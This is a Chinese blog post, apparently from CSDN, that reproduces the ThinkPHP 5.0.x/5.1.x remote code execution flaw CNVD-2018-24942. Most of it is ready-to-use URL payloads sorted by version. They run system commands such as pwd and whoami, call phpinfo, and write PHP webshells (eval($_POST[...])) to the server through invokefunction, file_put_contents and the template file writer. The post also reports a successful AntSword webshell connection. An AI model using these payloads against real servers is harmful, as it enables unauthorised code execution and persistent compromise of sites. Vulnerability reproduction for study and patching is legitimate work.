ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现

40 篇文章 35 订阅
32 篇文章 14 订阅
本文详细介绍了ThinkPHP 5.0.x版本中的安全漏洞,包括受影响的版本范围、漏洞复现步骤以及不同版本的POC。针对5.0.8至5.0.19及5.0.20至5.0.23的多个版本,分别给出了利用示例,并提供了可能导致代码执行和文件写入的攻击路径。此外,还提及了5.1.x版本在不同PHP版本上的漏洞利用方式。了解这些漏洞有助于加强应用程序的安全防护。
摘要由CSDN通过智能技术生成

影响范围

ThinkPHP 5.0.全版本

5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。

漏洞复现

访问靶机

 传入

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

 写入一个shell.php

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[123])?%3E

 蚁剑连接成功

大佬的poc

# 版本号5.0.8~5.0.19
?s=whoami&_method=__construct&filter&filter=system
# 版本号5.0.20~5.0.23
_method=__construct&filter[]=system&method=get&server[REQUSET_METHOD]=whoami

 5.1.x php版本>5.5:

?s=index/think\request/input?data[]=phpinfo()&filter=assert
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>

5.0.x php版本>=5.4:


?s=index/\\think\\template\driver\\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>'

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>'

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[xxxxxx]);?>\'>zxc2.php'
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值